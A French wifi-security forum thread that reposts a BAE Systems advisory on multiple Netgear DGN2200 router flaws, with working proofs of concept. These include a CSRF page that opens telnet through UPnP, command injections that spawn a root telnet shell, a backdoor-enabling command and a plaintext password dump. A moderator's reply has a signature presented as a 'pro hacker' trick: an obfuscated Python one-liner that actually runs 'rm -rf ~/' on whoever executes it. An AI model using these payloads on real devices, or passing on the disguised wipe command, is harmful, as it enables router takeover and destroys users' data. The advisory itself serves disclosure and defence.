Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-02-2014 18:30:47

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Cumul de failles graves sur les Netgear DGN2200

Aïe, aïe

Il y a des ratés dans l'histoire du wireless et si nous nous amusions à établir un petit ranking des routeurs les plus pourâves en matière de sécurité, nous aurions là un superbe concurrent.


h_1392571035_2957236_d0c0ffe427.png


La conclusion de Andrew Horton est l'on ne peut plus claire

End User Recommendation
=======================
Replace your NetGear router with a more recent model that can receive updated firmware.

  Nous sommes en présence du cas typique du router sacrifié sur l'hôtel de la con-sommation ou dans ce monde de technologie à obsolescence programmée et de production de masse; des millions de con-somateurs sont laissés nus comme des vers et sans autres solutions que de balancer à la poubelle leur router dument payé.

  La liste des failles laisse songeur, si longue qu'elle en est presque ridicule tongue

 * Command Injection
            * Cross-site Request Forgery
            * UPNP Exploitation through Cross-site Request Forgery
            * Insecure FTP Root
            * Cannot Disable WPS
            * Passwords Stored in Plaintext
            * Information Disclosure
            * Firmware Update MITM

Voici doc l'exploit dans sa version complète

Title: Multiple vulnerabilities in NETGEAR N300 WIRELESS ADSL2+ MODEM ROUTER DGN2200
====================================================================================

  Notification Date:  11 February 2014
  Affected Vendor:  NetGear
  Affected Hardware:  NetGear DGN2200 N300 Wireless ADSL2+ Modem Router
  Firmware Version:  V1.0.0.36-7.0.37
  Issue Types:    * Command Injection
            * Cross-site Request Forgery
            * UPNP Exploitation through Cross-site Request Forgery
            * Insecure FTP Root
            * Cannot Disable WPS
            * Passwords Stored in Plaintext
            * Information Disclosure
            * Firmware Update MITM
  Advisory Code:    AIS-2014-003
  Discovered by:    Andrew Horton
  Issue status:    No patch available - product beyond End of Life


Summary
=======
BAE Systems Applied Intelligence researcher, Andrew Horton has identified that the NetGear N300 Wireless ADSL 2+ Modem Router model DGN2200 suffers from multiple vulnerabilities which may be exploited by both local and remote attackers. This enables an attacker to completely compromise the device and stage further attacks against the local network and internet.

NetGear have indicated that this product is beyond its end of life and therefore these vulnerabilities will not be patched. As a result, BAE Systems have delayed release of this advisory for over 12 months to reduce the likelihood of active exploitation. 


1.  UPNP Vulnerable to CSRF
===========================

Requires
--------
Luring an unauthenticated or authenticated user to an attacker-controlled webpage.


Description
-----------
The Universal Plug and Play (UPNP) implementation used by NetGear accepts an HTTP POST request as a valid XML request, rendering the UPNP service vulnerable to inter-protocol Cross-Site Request Forgery attacks. This can be used to bypass or alter firewall rules.

The UPNP interface of the router listens on TCP port 5000 and can only be accessed from the LAN side of the device. UPNP requests do not require authentication with passwords. This vulnerability exists because the request is initiated by a user's browser on the LAN side of the device.


Impact
------
Using this vulnerability, BAE Systems was able to add new firewall rules to enable internet access to the insecure telnet port and the admin web interface.


Proof of concept
----------------
The following webpage will make telnet for the router accessible to the internet so that it may be attacked using the GearDog  backdoor (See issue 5). The GearDog backdoor is a known remote access backdoor implemented in many NetGear products. This requires brute-forcing the MAC address.

  <html>
  <form action="http://192.168.0.1:5000/Public_UPNP_C3" method="post" ENCTYPE="text/plain">
  <textarea id="1" name="1"><?xml version="1.0"?>
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
  .<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
  <NewPortMappingDescription>hax3</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>192.168.0.1</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>887</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>23</NewInternalPort>
  .</m:AddPortMapping>
  </SOAP-ENV:Body>
  </SOAP-ENV:Envelope></textarea>
  <input type="submit" >
  </form>
  <script> document.forms[0].submit();</script>
  </html>  

Note: 192.168.0.1 is the default LAN IP address. Port 23 is the internal port number and port 887 is the external port number to be opened.


Solution
--------
Ensure that UPNP requests sent through HTTP POST parameters are not honoured.



2.  Command Execution with Ping
===============================

Requires
--------
Authenticated access to the web administration interface.


Description
-----------
The ping function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system  as the root user.


Proof of concept
----------------
Example exploitation to obtain a file and directory listing:

  POST /ping.cgi HTTP/1.1
  Host: 192.168.0.1
  Proxy-Connection: keep-alive
  Content-Length: 81
  Cache-Control: max-age=0
  Authorization: Basic YWRtaW46YXBwbGU3ODE=
  Origin: http://192.168.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
  Content-Type: application/x-www-form-urlencoded
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Referer: http://192.168.0.1/DIAG_diag.htm
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

  IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls

To get an interactive shell, 

1. Send the following POST data:
IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
2. Telnet to port 90


Solution
--------
Validate untrusted user input using a whitelist of acceptable values. For example, IPv4 address values may only include the digits '0' through '9', and full stops ('.')



3.  Blind Command Execution with DNS Lookup
===========================================

Requires
--------
Authenticated access to the web administration interface.


Description
-----------
The DNS lookup function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system but was unable to see the response.


Proof of concept
----------------
Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server:

  POST /dnslookup.cgi HTTP/1.1
  Host: 192.168.0.1
  Proxy-Connection: keep-alive
  Content-Length: 32
  Cache-Control: max-age=0
  Authorization: Basic YWRtaW46YXBwbGU3ODE=
  Origin: http://192.168.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
  Content-Type: application/x-www-form-urlencoded
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Referer: http://192.168.0.1/DIAG_diag.htm
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

  host_name=|sleep 5&lookup=Lookup

To get an interactive shell, 

1.  Send the following POST data:
hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup
2.  Telnet to port 90


Solution
--------
Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops (‘.’) and hyphens ('-').



4.  No Cross-Site Request Forgery (CSRF) Protection
===================================================

Requires
--------
Luring a logged in admin user into following a malicious link  


Description
-----------
An attacker can lure a user into following an untrusted link to a malicious webpage that will exploit the lack of CSRF protection by forcing the user's web browser to perform unwanted actions, such as altering firewall rules. This attack returns no information to the attacker, so it is effectively 'blind', however this does not detract from the threat.

The command execution vulnerabilities described above can be performed through CSRF.


Impact
------
Using this vulnerability, BAE Systems was able to update configuration of the device, including changing WPA keys, alter firewall rules and perform command execution through exploitation of the ping and DNS features.


Solution
--------
Include an anti-CSRF token in all web forms and ensure that the token is present and correct when HTTP requests for actions are received.



5.  Gearguy/Geardog Telnet Backdoor
===================================

Requires
--------
Ability to telnet to port 23 (only on LAN side by default)  


Description
-----------
There is a backdoor (feature) built into many NetGear devices, where a user can gain operating system command access without requiring a password. This issue has been previously reported in other NetGear devices. 

NetGear provides a windows executable to do this. A Linux client is available from http://code.google.com/p/netgear-telnetenable/

Send a Blowfish encrypted message to port 23 from the LAN. When you reconnect, it provides a shell without a password required.


Impact
------
Using this vulnerability, BAE Systems was able to gain a root shell on the underlying Linux operating system without supplying any authentication credentials. This would allow complete device compromise, which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Proof of concept
----------------
python telnet-enabler.py 192.168.0.1 "204E7F2172C8" Gearguy Geardog
Sent telnet enable payload to '192.168.0.1:23'


Solution
--------
Remove the backdoor feature from the device. If a ‘last resort’ admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function.



6.  FTP Insecure Root Directory
===============================

Requires
--------
FTP to be enabled (not enabled by default)


Description
-----------
The FTP server allows a user to access configuration files and to traverse outside the folder that contains files intended to be shared by FTP.
It is possible to list and retrieve files in the / folder, however the user is restricted from using the cd or CWD command to change the current directory to '/'.


Impact
------
Using this vulnerability, BAE Systems was able to gain access to sensitive configuration files.


Proof of concept
----------------
  [email protected]# ftp 192.168.0.1
  Connected to 192.168.0.1.
  230 User logged in.
  Name (192.168.0.1:root): ftp
  230 User logged in.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp> ls 
  200 PORT 192.168.0.6:49211 OK
  150 BINARY data connection established.
  lrwxrwxrwx   1 nobody   root     18 Jan 01  2003 USB_Storage
  226 Directory list has been submitted.
  ftp> cd /
  550 Error: Access Denied.
  ftp> ls /
  200 PORT 192.168.0.6:55927 OK
  150 BINARY data connection established.
  -rw-r--r--   1 nobody   root     2 Jan 01  2003 all_no_password
  -rw-r--r--   1 nobody   root     1700 Jan 01  2003 bftpd.conf
  drwxr-xr-x   3 nobody   root     0 Jan 01  2003 conf
  -rw-r--r--   1 nobody   root     2 Jan 01  2003 lan3_time
  -r--r--r--   1 nobody   root     1430 Jan 01  2003 lan_dev
  -rw-r--r--   1 nobody   root     2 Jan 01  2003 lan_time
  drwxr-xr-x  48 nobody   root     0 Jan 01  2003 mnt
  -rw-r--r--   1 nobody   root     1 Jan 01  2003 opendns.flag
  -rw-r--r--   1 nobody   root     0 Jan 01  2003 opendns.tbl
  -rw-r--r--   1 nobody   root     0 Jan 01  2003 opendns_auth.tbl
  drwxr-xr-x   2 nobody   root     0 Jan 01  2003 ppp
  -rw-r--r--   1 nobody   root     38 Jan 01  2003 resolv.conf
  -rw-r--r--   1 nobody   root     208 Jan 01  2003 ripd.conf
  drwxr-xr-x   4 nobody   root     0 Jan 01  2003 samba
  drwxr-xr-x   2 nobody   root     0 Jan 01  2003 shares
  -rw-r--r--   1 nobody   root     262 Jan 01  2003 space_info
  -rw-------   1 nobody   root     2 Oct 14 14:15 timesync
  -rw-r--r--   1 nobody   root     242 Jan 01  2003 udhcpd.conf
  -rw-r--r--   1 nobody   root     0 Jan 01  2003 udhcpd.leases
  -rw-r--r--   1 nobody   root     4 Jan 01  2003 udhcpd.pid
  -rw-r--r--   1 nobody   root     2 Jan 01  2003 udhcpd_resrv.conf
  -rw-r--r--   1 nobody   root     3562 Jan 01  2003 upnp_xml
  drwxr-xr-x   2 nobody   root     0 Jan 01  2003 usb_vol_name
  drwxr-xr-x  11 nobody   root     0 Jan 01  2003 var
  -r--r--r--   1 nobody   root     1922 Jan 01  2003 wan_dev
  -rw-r--r--   1 nobody   root     3 Jan 01  2003 wan_time
  drwxr-xr-x   2 nobody   root     0 Jan 01  1999 wlan
  -rw-r--r--   1 nobody   root     2 Jan 01  2003 wlan_time
  -rw-r--r--   1 nobody   root     0 Jan 01  2003 zebra.conf
  226 Directory list has been submitted.
  ftp> 
  ftp> get /bftpd.conf 
  local: ./bftpd.conf remote: /bftpd.conf
  200 PORT 192.168.0.5:53750 OK
  150 BINARY data connection established.
  226 File transmission successful.
  1454 bytes received in 0.00 secs (3256.7 kB/s)


Solution
--------
Enforce the folder restriction to the /shares folder for all FTP commands.



7.  Cannot Disable WPS
======================

Requires
--------
Local proximity and WiFi enabled


Description
-----------
Wi-Fi Protected Setup (WPS) is an insecure protocol vulnerable to bruteforce attacks due to design vulnerabilities. The NetGear device does not provide an effective method to disable WPS. An attacker with local proximity to the device while WiFi is enabled, can bruteforce WPS, and obtain the WPA key which allows an attacker to connect to the WiFi access point, and decrypt WiFi traffic from other users. 

Software such as Reaver, can be used to brute-force the WPS key, usually within about ten hours. Reaver is available from http://code.google.com/p/reaver-wps.

The 'Advanced Wireless Settings' page contains the following section:
  WPS Settings
  Router's PIN:  99999999
  [Tickbox] Disable Router's PIN 
  [Tickbox] Keep Existing Wireless Settings

  Ticking the 'Disable Router's PIN' box appears to have no effect.


Impact
------
Using this vulnerability, BAE Systems was able to crack the wireless password, and gain access to the WPA2 PSK wireless network hosted by the device.


Proof of concept
----------------
This vulnerability can be exploited with the Reaver tool available from http://code.google.com/p/reaver-wps/.


Solution
--------
Implement a method for users to easily and effectively disable WPS.



8.  Passwords Stored in Plaintext
=================================

Requires
--------
Telnet access or exploitation of a vulnerability providing command execution


Description
-----------
The router stores passwords in the /etc/passwd file in plaintext instead of using encrypted hashes.


Impact
------
Using this vulnerability, BAE Systems was able to learn the passwords used to access the device. 


Proof of concept
----------------
# cat /etc/passwd
nobody:*:0:0:nobody:/:/bin/sh
admin:s3cr3tp4ssw0rd:0:0:admin:/:/bin/sh
guest:guest:0:0:guest:/:/bin/sh


Solution
--------
Store user passwords as a non-reversible cryptographic hash, such as SHA-256.



9.  Pre-Authentication Information Disclosure
=============================================

Requires
--------
Unauthenticated access to the web interface


Description
-----------
This issue has been previously reported in other NetGear devices and is the same issue reported here: 
* http://websec.mx/advisories/view/Revelacion_de_informacion_en_Netgear


Impact
------
Using this vulnerability, BAE Systems was able to learn some identifying features of the device without needing to provide credentials.


Proof of concept
----------------
URL: http://192.168.0.1/currentsetting.htm
Firmware=V1.0.0.36_7.0.36
RegionTag=DGN2200_WW
Region=ww
Model=DGN2200
InternetConnectionStatus=Up
ParentalControlSupported=1


Solution
--------
Restrict access to webpages containing sensitive functionality or data to authenticated users.



10.  Firmware Update Vulnerable to Man In The Middle
===================================================

Requires
--------
Control of the user’s network, for example at the ISP level or local network.


Description
-----------
Each time an admin logs into the web interface, the web interface attempts to find new firmware on an FTP server.

FTP is an insecure protocol that is vulnerable to man-in-the-middle attacks. An attacker could provide a backdoored version of the firmware.

Updates are sourced from: ftp://14.0.34.208/dgn2200/ww/


Impact
------
Using this vulnerability, BAE Systems was able to provide a malicious firmware image to the router.


Solution
--------
Retrieve updates using a protocol with SSL/TLS with certificate validation.
Apply a public key signature to firmware images and check them before usage.



End User Recommendation
=======================
Replace your NetGear router with a more recent model that can receive updated firmware.


Disclosure Time-Line
====================
29/11/2012  -  Vendor notified
6/12/2012  -  Vendor acknowledges vulnerabilities but advises that the product is beyond its end of life and will not be patched
11/2/2014  -  Advisory released


Contact
====================
Advisory URL: http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-%28AIS-2014

Website: www.baesystems.com



Lu  dans NetGear DGN2200 N300 CSRF / Disclosure / Command Execution  -  Authored by Andrew Horton

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-02-2014 18:36:37

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Cumul de failles graves sur les Netgear DGN2200

lol


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]